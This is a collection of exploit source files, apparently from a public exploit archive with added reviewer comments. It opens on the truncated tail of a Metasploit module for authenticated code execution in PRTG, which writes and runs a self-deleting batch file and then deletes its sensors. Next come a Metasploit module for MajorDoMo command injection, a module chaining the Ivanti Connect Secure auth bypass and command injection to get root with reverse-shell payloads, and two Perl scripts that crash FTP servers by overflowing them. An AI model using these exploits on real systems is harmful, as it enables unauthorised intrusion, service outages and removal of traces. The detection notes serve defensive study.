register_options(<br /> [<br /> OptString.new(<br /> 'USERNAME',<br /> [ true, 'The username to authenticate with', 'prtgadmin' ]<br /> ),<br /> OptString.new(<br /> 'PASSWORD',<br /> [ true, 'The password to authenticate with', 'prtgadmin' ]<br /> ),<br /> OptString.new(<br /> 'TARGETURI',<br /> [ true, 'The URI for the PRTG web interface', '/' ]<br /> )<br /> ]<br /> )<br /> end<br /><br /> def check<br /> begin<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(datastore['URI'], '/index.htm')<br /> })<br /> rescue 
::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
      # Tail of `check`; the method's opening lines, including the request that
      # sets `res` and `html`, are outside this view. Transport failures are
      # reported as Unknown rather than Safe.
      return CheckCode::Unknown
    ensure
      disconnect
    end

    # A 'PRTG' marker in the Server header or the page body only shows the
    # product is present, not that it is vulnerable, hence Detected.
    if res && res.code == 200
      prtg_server_header = res.headers['Server']

      if (prtg_server_header.include? 'PRTG') || (html.to_s.include? 'PRTG')
        return CheckCode::Detected
      end
    end

    return CheckCode::Unknown
  end

  # Exploit entry point. Every sensor created during the run is recorded in
  # @sensors_to_delete so on_new_session can remove it afterwards. The target
  # type selects the delivery path: :win_cmdstager goes through the framework
  # command stager, :win_fetch hands the encoded fetch payload to
  # execute_command directly.
  def exploit
    @sensors_to_delete = []

    connect
    case target['Type']
    when :win_cmdstager
      execute_cmdstager
    when :win_fetch
      execute_command(payload.encoded)
    end
  end

  # Cleanup hook: once a session is established, the HL7 and EXE sensors that
  # carried the payload are deleted again. Responders should therefore not
  # expect to find the sensors themselves; the addsensor5.htm, scannow.htm and
  # deleteobject.htm requests are where the activity can still be traced
  # (assuming web-server logging is enabled on the PRTG host).
  def on_new_session(client)
    super
    @sensors_to_delete.each do |sensor_id|
      delete_sensor_by_id(sensor_id)
    end
    print_good('Session created')
  end

  # Runs one command on the PRTG host: log in, have PRTG write `cmd` into a
  # .bat file via an HL7 sensor, then execute that file via an EXE/Script
  # sensor, and finally start the payload handler. `_opts` is accepted for
  # CmdStager compatibility and ignored. Requires valid PRTG credentials
  # (USERNAME/PASSWORD options); this is an authenticated exploit.
  def execute_command(cmd, _opts = {})
    print_status('Running PRTG RCE exploit')
    authenticate_prtg
    bat_file_name = write_bat_file_to_disk(cmd)
    run_bat_file_from_disk(bat_file_name)
    print_status('Exploit done')
    handler
  end

  # Logs in through public/checklogin.htm with the USERNAME/PASSWORD options
  # (registered outside this view) and keeps the session cookie for the
  # following requests. Only a 302 that sets cookies counts as success; any
  # other outcome aborts the module with NoAccess.
  def authenticate_prtg
    print_status('Authenticating against PRTG')
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'public', 'checklogin.htm'),
      'keep_cookies' => true,
      'vars_post' => {
        'username' => datastore['USERNAME'],
        'password' => datastore['PASSWORD']
      }
    })
    unless res
      fail_with(Failure::NoAccess, 'Failure to connect to PRTG')
    end
    # `res &&` is redundant after the guard above; kept as written.
    if res && res.code == 302 && res.get_cookies
      print_good('Successfully authenticated against PRTG')
    else
      fail_with(Failure::NoAccess, 'Failure to authenticate against PRTG')
    end
  end

  # Fetches welcome.htm and extracts the anti-CSRF token from its
  # `csrf-token` meta tag. The token is returned exactly as found: when the
  # pattern is absent the result is nil and callers send it unchanged.
  def get_csrf_token
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'welcome.htm'),
      'keep_cookies' => true
    })

    if res.nil? || res.body.nil?
      fail_with(Failure::NoAccess, 'Page with CSRF token not available')
    end

    regex = /csrf-token" content="([^"]+)"/
    token = res.body[regex, 1]

    print_status("Extracted csrf token: #{token}")
    token
  end

  # Removes a sensor through api/deleteobject.htm (approve=1 skips the
  # confirmation step). Only the presence of a response body is checked; the
  # HTTP status is not inspected, so a refused deletion is not reported.
  def delete_sensor_by_id(sensor_id)
    print_status("Deleting sensor #{sensor_id}")
    csrf_token = get_csrf_token

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'api', 'deleteobject.htm'),
      'keep_cookies' => true,
      'headers' => {
        'anti-csrf-token' => csrf_token,
        'X-Requested-With' => 'XMLHttpRequest'
      },
      'vars_post' => {
        id: sensor_id,
        approve: 1
      }
    })

    if res.nil? || res.body.nil?
      fail_with(Failure::NoAccess, 'Sensor deletion failed')
    end
  end

  # Scrapes the device-overview page of the hard-coded device id 40 for the
  # link text of the sensor named `sensor_name` and returns the numeric id in
  # front of it (nil while the sensor is not yet listed, which is why callers
  # wrap this in retry_until_truthy). `sensor_name` is interpolated into the
  # regex unescaped; both callers generate it with rand_text_alphanumeric, so
  # no metacharacters reach the pattern.
  def get_created_sensor_id(sensor_name)
    print_status('Fetching created sensor id')

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'controls', 'deviceoverview.htm'),
      'keep_cookies' => true,
      'vars_get' => {
        'id' => 40
      }
    })

    if res.nil? || res.body.nil?
      fail_with(Failure::NoAccess, 'Page with sensorid not available')
    end

    regex = /id=([0-9]+)">#{sensor_name}/
    sensor_id = res.body[regex, 1]

    print_status("Extracted sensor_id: #{sensor_id}")
    sensor_id
  end

  # Triggers an immediate scan of the given sensor via api/scannow.htm; for
  # the sensors created here the scan is what makes PRTG run the configured
  # program. Anything other than a 200 aborts the module.
  def run_sensor_with_id(sensor_id)
    csrf_token = get_csrf_token
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'api', 'scannow.htm'),
      'keep_cookies' => true,
      'headers' => {
        'anti-csrf-token' => csrf_token,
        'X-Requested-With' => 'XMLHttpRequest'
      },
      'vars_post' => {
        id: sensor_id
      }
    })

    if res && res.code == 200
      print_good('Sensor started running')
    else
      fail_with(Failure::NoAccess, 'Failure to run sensor')
    end
  end

  # Creates an HL7 sensor whose parameters make PRTG write `cmd` to disk:
  # `recvfac_` closes its quoted argument and appends
  # -debug="..\Custom Sensors\EXE\<random>.bat" (presumably redirecting the
  # sensor's debug output into the EXE/Script sensor directory — the PRTG-side
  # behaviour is not visible here), while `hl7file_` carries the command that
  # ends up in that file. The sensor is scanned once and queued for deletion.
  # Returns the generated .bat file name.
  # Observable artefacts: a sensor tagged 'dicom hl7' on device 40 (port 104),
  # and a .bat with an 8-10 character alphanumeric name under
  # Custom Sensors\EXE that deletes itself (`del %0`) when run.
  def write_bat_file_to_disk(cmd)
    # Uses the HL7Sensor for writing a .bat file to the disk
    # Each backslash in cmd becomes three (gsub! edits cmd in place).
    cmd = cmd.gsub! '\\', '\\\\\\'
    print_status('Writing .bat to disk')

    csrf_token = get_csrf_token

    # Generate a random sensor name
    sensor_name = Rex::Text.rand_text_alphanumeric(8..10)
    bat_file_name = "#{Rex::Text.rand_text_alphanumeric(8..10)}.bat"

    # Clean up the .bat file
    cmd = "#{cmd} & del %0"

    print_status("Generated sensor_name #{sensor_name}")
    print_status("Generated bat_file_name #{bat_file_name}")

    params = {
      'name_' => sensor_name,
      'parenttags_' => '',
      'tags_' => 'dicom hl7',
      'priority_' => '3',
      'port_' => '104',
      'timeout_' => '60',
      'override_' => '0',
      'sendapp_' => Rex::Text.rand_text_alphanumeric(4..5),
      'sendfac_' => Rex::Text.rand_text_alphanumeric(4..5),
      'recvapp_' => Rex::Text.rand_text_alphanumeric(4..5),
      'recvfac_' => "#{Rex::Text.rand_text_alphanumeric(4..5)}\" -debug=\"..\\Custom Sensors\\EXE\\#{bat_file_name}\" -recvapp=\"#{Rex::Text.rand_text_alphanumeric(4..5)}",
      'hl7file_' => "ADT_& #{cmd} & A08.hl7|ADT_A08.hl7||",
      'hl7filename' => '',
      'intervalgroup' => ['0', '1'],
      'interval_' => '60|60 seconds',
      'errorintervalsdown_' => '1',
      'inherittriggers' => '1',
      'id' => '40',
      'sensortype' => 'hl7',
      'tmpid' => '2',
      'anti-csrf-token' => csrf_token
    }

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'addsensor5.htm'),
      'keep_cookies' => true,
      'vars_post' => params
    })

    unless res
      fail_with(Failure::NoAccess, 'Failure to connect to PRTG')
    end

    if res && res.code == 302
      print_good('HL7 Sensor succesfully created')
    else
      fail_with(Failure::NoAccess, 'Failure to create HL7 sensor')
    end
    # Actually creating the sensor can take 1-2 seconds
    print_status('Checking for sensor creation')
    sensor_id = retry_until_truthy(timeout: 10) do
      get_created_sensor_id(sensor_name)
    end

    print_status('Requesting HL7 Sensor to initiate scan')

    run_sensor_with_id(sensor_id)
    @sensors_to_delete.push(sensor_id)

    print_good('.bat file written to disk')
    bat_file_name
  end

  # Creates an EXE/Script sensor that points at the .bat produced by
  # write_bat_file_to_disk (`exefile_`), scans it once so PRTG executes the
  # file, and queues the sensor for deletion. Observable artefacts: a sensor
  # tagged 'exesensor' on device 40 with a random 8-10 character name and a
  # 12-hour interval.
  def run_bat_file_from_disk(bat_file_name)
    print_status("Running the .bat file: #{bat_file_name}")
    csrf_token = get_csrf_token
    sensor_name = Rex::Text.rand_text_alphanumeric(8..10)

    params = {
      'name_' => sensor_name,
      'parenttags_' => '',
      'tags_' => 'exesensor',
      'priority_' => '3',
      'scriptplaceholdergroup' => '1',
      'scriptplaceholder1description_' => '',
      'scriptplaceholder1_' => '',
      'scriptplaceholder2description_' => '',
      'scriptplaceholder2_' => '',
      'scriptplaceholder3description_' => '',
      'scriptplaceholder3_' => '',
      'scriptplaceholder4description_' => '',
      'scriptplaceholder4_' => '',
      'scriptplaceholder5description_' => '',
      'scriptplaceholder5_' => '',
      'exefile_' => "#{bat_file_name}|#{bat_file_name}||",
      'exefilelabel' => '',
      'exeparams_' => '',
      'environment_' => '0',
      'usewindowsauthentication_' => '0',
      'mutexname_' => '',
      'timeout_' => '60',
      'valuetype_' => '0',
      'channel_' => 'Value',
      'unit_' => '#',
      'monitorchange_' => '0',
      'writeresult_' => '0',
      'intervalgroup' => '0',
      'interval_' => '43200|12 hours',
      'errorintervalsdown_' => '1',
      'inherittriggers' => '1',
      'id' => '40',
      'sensortype' => 'exe',
      'tmpid' => '6',
      'anti-csrf-token' => csrf_token
    }

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'addsensor5.htm'),
      'keep_cookies' => true,
      'vars_post' => params
    })

    unless res
      fail_with(Failure::NoAccess, 'Failure to connect to PRTG')
    end

    if res && res.code == 302
      print_status('EXE Script sensor created')
    else
      fail_with(Failure::NoAccess, 'Failure to create EXE Script sensor')
    end

    print_status('Checking for sensor creation')

    sensor_id = retry_until_truthy(timeout: 10) do
      get_created_sensor_id(sensor_name)
    end
    run_sensor_with_id(sensor_id)
    @sensors_to_delete.push(sensor_id)
    print_good('Exploit completed. Waiting for payload')
  end
end
#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: Solar FTP Server 2.1.2 - PASV - Denial of Service (DoS)
# Discovery by: Fernando Mengali
# Discovery Date: 23 january 2024
# Vendor Homepage: N/A
# Download to demo: https://drive.google.com/file/d/1o4xTt67bUJYAAKm0pqNIG99ly--xRQBp/view?usp=sharing
# Notification vendor: No reported
# Tested Version: Solar FTP Server 2.1.2 - PASV - Denial of Service (DoS)
# Tested on: Windows XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Denial of Service (DoS)
# Video: https://www.youtube.com/watch?v=U9nH6gqyT88

#1. Description

#This technique works fine against Windows XP Professional Service Pack 2 and 3 (English).
#For this exploit I have tried several strategies to increase reliability and performance:
#Jump to a static 'call esp'
#Backwards jump to code a known distance from the stack pointer.
# NOTE(review): the two lines above do not apply to this PoC. The code below carries no
# return address or shellcode; it only sends oversized PASV arguments and relies on the
# server failing to handle them.
#The FTP server does not correctly handle the amount of data or bytes sent.
#When authenticating to the FTP server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

# No 'use strict'/'use warnings': $sis, $cmd, $ip and $port are all package globals.
$sis="$^O";

# Clear the terminal before printing the banner.
# NOTE(review): perl reports $^O as "MSWin32" on Windows, never "windows", so the "cls"
# branch is not taken there and "clear" is run on every platform.
if ($sis eq "windows"){
    $cmd="cls";
} else {
    $cmd="clear";
}

system("$cmd");

intro();
main();    # sets $ip and $port from @ARGV, or prints usage and exits

print "[+] Exploiting... \n";

print "[+] Connecting to $ip:$port\n";
# NOTE(review): $host is never declared, so the die message interpolates an empty host;
# $ip is the variable actually used for the connection.
my $s = IO::Socket::INET->new(PeerAddr => $ip, PeerPort => $port, Proto => 'tcp') or die "Could not connect to $host:$port\n";

# Anonymous login followed by SYST. Neither send() nor the readline results are
# checked, so if the server has gone away the replies print as empty lines.
$s->send("USER anon\r\n");
my $response = <$s>;
print $response;
$s->send("PASS anon\r\n");
$response = <$s>;
print $response;
$s->send("SYST\r\n");
$response = <$s>;
print $response;
sleep(2);
# First oversized PASV argument: 6631 'A' (0x41) bytes. A PASV command with an
# argument of this length in a single session is the signature to look for in
# FTP server or IDS logs.
$s->send("PASV " . "\x41"x6631 . "\r\n");
sleep(3);
$response = <$s>;
print $response;
$response = <$s>;
print $response;
print ">>> Sending second payload\n";
# Second PASV argument: 123 + 2877 = 3000 NOP (0x90) bytes; the split is cosmetic
# and no return address accompanies them.
$s->send("PASV " . "\x90"x123 . "\x90"x2877 . "\r\n");
$response = <$s>;
print $response;
sleep(2);


print "[+] Done - Exploited success!!!!!\n\n";

# Prints the banner.
sub intro {
    print "######################################################################\n";
    print "# #\n";
    print "# Solar FTP Server 2.1.2 - PASV - Denied of Service #\n";
    print "# #\n";
    print "# Coded by Fernando Mengali #\n";
    print "# #\n";
    print "# e-mail: fernando.mengalli\@gmail.com #\n";
    print "# #\n";
    print "######################################################################\n";
}

# Argument handling. `our` makes $ip and $port the package globals that the
# top-level code reads after main() returns; with either missing, usage is
# printed and the script exits.
sub main {

our ($ip, $port) = @ARGV;

    unless (defined($ip) && defined($port)) {

        print " \nUsage: $0 <ip> <port> \n";
        exit(-1);

    }
}
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# MajorDoMo command injection (CVE-2023-50917). The injection point is the
# `transport` query parameter of modules/thumb/thumb.php, reached with
# debug=1 and a base64-encoded `url`. Detection: a GET to that path whose
# `transport` value contains `|| $(` is the request this module sends; the
# module itself declares IOC_IN_LOGS.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MajorDoMo Command Injection',
        'Description' => %q{
          This module exploits a command injection vulnerability in MajorDoMo
          versions before 0662e5e.
        },
        'Author' => [
          'Valentin Lobstein', # Vulnerability discovery and Metasploit Module
          'smcintyre-r7', # Assistance
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2023-50917'],
          ['URL', 'https://github.com/Chocapikk/CVE-2023-50917'],
          ['URL', 'https://chocapikk.com/posts/2023/cve-2023-50917'],
          ['URL', 'https://github.com/sergejey/majordomo'] # Vendor URL
        ],
        'DisclosureDate' => '2023-12-15',
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'SideEffects' => [ IOC_IN_LOGS ],
          'Reliability' => [ REPEATABLE_SESSION ]
        },
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD],
        'Targets' => [['Automatic', {}]],
        'Privileged' => false
      )
    )

    register_options([
      Opt::RPORT(80),
      OptString.new('TARGETURI', [true, 'The URI path to MajorDoMo', '/']),
    ])
  end

  # Sends `cmd` through the injectable `transport` parameter and returns the
  # HTTP response (or nil when none arrived); `check` relies on that return.
  # No authentication is performed.
  def execute_command(cmd)
    send_request_cgi(
      'uri' => normalize_uri(datastore['TARGETURI'], 'modules', 'thumb', 'thumb.php'),
      'method' => 'GET',
      'vars_get' => {
        'url' => Rex::Text.encode_base64('rtsp://'),
        'debug' => '1',
        'transport' => "|| $(#{cmd});"
      }
    )
  end

  # Fires the encoded command payload; the response is not inspected.
  def exploit
    execute_command(payload.encoded)
  end

  # Two-stage check: fingerprint the product by the MD5 of favicon.ico, then
  # confirm the injection with a time-based probe (a `sleep` of 5-10 seconds,
  # judged vulnerable when the round trip takes at least that long). The probe
  # is itself a command execution on the target and leaves the same log trace
  # as the exploit.
  def check
    print_status("Checking if #{peer} can be exploited!")
    res = send_request_cgi(
      'uri' => normalize_uri(datastore['TARGETURI'], 'favicon.ico'),
      'method' => 'GET'
    )

    unless res && res.code == 200
      return CheckCode::Unknown('Did not receive a response from target.')
    end

    unless Rex::Text.md5(res.body) == '08d30f79c76f124754ac6f7789ca3ab1'
      return CheckCode::Safe('The target is not MajorDoMo.')
    end

    print_good('Target is identified as MajorDoMo instance')
    sleep_time = rand(5..10)
    print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")
    # Rex::Stopwatch.elapsed_time yields the block's result and the seconds taken.
    res, elapsed_time = Rex::Stopwatch.elapsed_time do
      execute_command("sleep #{sleep_time}")
    end
    print_status("Elapsed time: #{elapsed_time} seconds.")
    unless res && elapsed_time >= sleep_time
      return CheckCode::Safe('Failed to test command injection.')
    end

    CheckCode::Vulnerable('Successfully tested command injection.')
  end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Ivanti Connect Secure / Policy Secure: CVE-2023-46805 (auth bypass via the
# `/api/v1/totp/user-backup-code/../../` path prefix) chained with
# CVE-2024-21887 (command injection in the `type` field of the
# cloud-server-test-connection endpoint). Detection: requests whose path
# contains that traversal prefix, and in particular a JSON POST to
# system/maintenance/archiving/cloud-server-test-connection whose `type`
# begins with ';'. Per the existing comment in `check`, the vendor mitigation
# answers the bypass with 403.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Ivanti Connect Secure Unauthenticated Remote Code Execution',
        'Description' => %q{
          This module chains an authentication bypass vulnerability (CVE-2023-46805) and a command injection
          vulnerability (CVE-2024-21887) to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti
          Policy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and
          22.x prior to the vendor mitigation are vulnerable. It is unknown if unsupported versions 8.x and below are
          also vulnerable.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'sfewer-r7', # MSF Exploit & Rapid7 Analysis
        ],
        'References' => [
          ['CVE', '2023-46805'], # The auth bypass vulnerability.
          ['CVE', '2024-21887'], # The command injection vulnerability.
          ['URL', 'https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis'],
          ['URL', 'https://labs.watchtowr.com/welcome-to-2024-the-sslvpn-chaos-continues-ivanti-cve-2023-46805-cve-2024-21887/']
        ],
        'DisclosureDate' => '2024-01-10',
        'Platform' => %w[linux unix],
        'Arch' => [ARCH_CMD],
        'Privileged' => true, # Code execution as root.
        'Targets' => [
          [
            # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:
            # cmd/linux/http/x64/meterpreter/reverse_tcp
            # cmd/linux/http/x64/shell/reverse_tcp
            # cmd/linux/http/x86/shell/reverse_tcp
            'Linux Command',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_CMD]
            },
          ],
          [
            # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:
            # cmd/unix/python/meterpreter/reverse_tcp
            # cmd/unix/reverse_bash
            # cmd/unix/reverse_python
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => [ARCH_CMD]
            },
          ]
        ],
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true,
          'FETCH_WRITABLE_DIR' => '/tmp'
        },
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )
  end

  # Uses only the auth bypass (no command is run) to read the system-information
  # endpoint; a 200 means the bypass works, anything else is reported Safe.
  # Name/version/build are extracted purely for the check message. Note that
  # any non-200 (including a transient error) maps to Safe, not Unknown.
  def check
    # We leverage the auth bypass to request the authenticated endpoint /api/v1/system/system-information and retrieve
    # the target system version information. If this requests succeeds, the target is vulnerable.
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => '/api/v1/totp/user-backup-code/../../system/system-information'
    )

    return CheckCode::Unknown('Connection failed') unless res

    # If the vendor mitigation has been applied, the request will return 403 Forbidden.
    return CheckCode::Safe if res.code != 200

    # By here we know the target is vulnerable, we can pull out the exact version information from the expected JSON
    # response, this is only for display purposes, we don't need to test the version information.

    json_data = res.get_json_document

    name = json_data.dig('software-inventory', 'software', 'name')

    version = json_data.dig('software-inventory', 'software', 'version')

    build = json_data.dig('software-inventory', 'software', 'build')

    # Return CheckCode::Unknown if we got a JSON response but it didn't contain the expected keys, or if
    # get_json_document could not parse the JSON (and will return an empty Hash).
    return CheckCode::Unknown('No version information in response') if name.nil? || version.nil? || build.nil?

    Exploit::CheckCode::Vulnerable("#{name} #{version} (#{build})")
  end

  # Posts the encoded payload in the `type` field (terminated with ' #' so the
  # remainder of the server-side command line is commented out) through the
  # same bypass prefix. The remaining fields are random filler. The response
  # is not inspected; session establishment is left to the payload handler.
  def exploit
    send_request_cgi(
      'method' => 'POST',
      'uri' => '/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection',
      'ctype' => 'application/json',
      'data' => {
        'type' => ";#{payload.encoded} #",
        'txtGCPProject' => Rex::Text.rand_text_alpha(8),
        'txtGCPSecret' => Rex::Text.rand_text_alpha(8),
        'txtGCPPath' => Rex::Text.rand_text_alpha(8),
        'txtGCPBucket' => Rex::Text.rand_text_alpha(8)
      }.to_json
    )
  end
end
#!/usr/bin/perl

use IO::Socket;

# Exploit Title: EzServer 6.4.017 - Denied of Service (DoS)
# Discovery by: Fernando Mengali
# Discovery Date: 22 january 2024
# Vendor Homepage: N/A
# Download to demo: https://drive.google.com/file/d/1hCYYsWsyeuoHTh3ZosNRbtIBxw0culsu/view?usp=sharing
# Notification vendor: No reported
# Tested Version: EzServer 6.4.017 - Denied of Service (DoS)
# Tested on: Windows XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Denial of Service (DoS)

#1. Description

#This technique works fine against Windows XP Professional Service Pack 2 and 3 (English).
#For this exploit I have tried several strategies to increase reliability and performance:
#Jump to a static 'call esp'
#Backwards jump to code a known distance from the stack pointer.
# NOTE(review): the two lines above do not apply to this PoC. The code below carries no
# return address or shellcode; it sends one oversized buffer and closes the socket.
#The FTP server does not correctly handle the amount of data or bytes sent to command RNTO.
#When authenticating to the FTP server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing Denied of service conditions.
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

# No 'use strict'/'use warnings': $sis, $cmd, $ip and $port are all package globals.
$sis="$^O";

# Clear the terminal before printing the banner.
# NOTE(review): perl reports $^O as "MSWin32" on Windows, never "windows", so the "cls"
# branch is not taken there and "clear" is run on every platform.
if ($sis eq "windows"){
    $cmd="cls";
} else {
    $cmd="clear";
}

system("$cmd");

intro();
main();    # sets $ip and $port from @ARGV, or prints usage and exits

print "[+] Exploiting... \n";

# A single raw buffer of 10698 'A' (0x41) bytes.
# NOTE(review): the description names the RNTO command, but the code sends this buffer
# with no FTP verb and no login, straight after connecting. From a log/IDS perspective
# the observable is a fresh TCP session to the FTP port carrying ~10.7 KB of 0x41 bytes
# that is closed immediately afterwards.
my $payload = "\x41"x10698;

# send() and close() results are not checked.
my $sock = IO::Socket::INET->new(PeerAddr => $ip, PeerPort => $port, Proto => 'tcp') or die "[-] Could not connect!\n";
$sock->send($payload);
$sock->close();

print "[+] Done - Exploited success!!!!!\n\n";

# Prints the banner; q{...} is a non-interpolating literal, so the '@' in the
# e-mail address needs no escaping.
sub intro {
    print q {


 _/| 
 // o\ 
 || ._) 
 //__\ 
 )___( 

 [+] EzServer 6.4.017 - Denied of Service (DoS)

 [*] Coded by Fernando Mengali

 [@] e-mail: fernando.mengalli@gmail.com

 }
}

# Argument handling. `our` makes $ip and $port the package globals that the
# top-level code reads after main() returns; with either missing, usage is
# printed and the script exits.
sub main {

our ($ip, $port) = @ARGV;

    unless (defined($ip) && defined($port)) {

        print " \nUsage: $0 <ip> <port> \n";
        exit(-1);

    }
}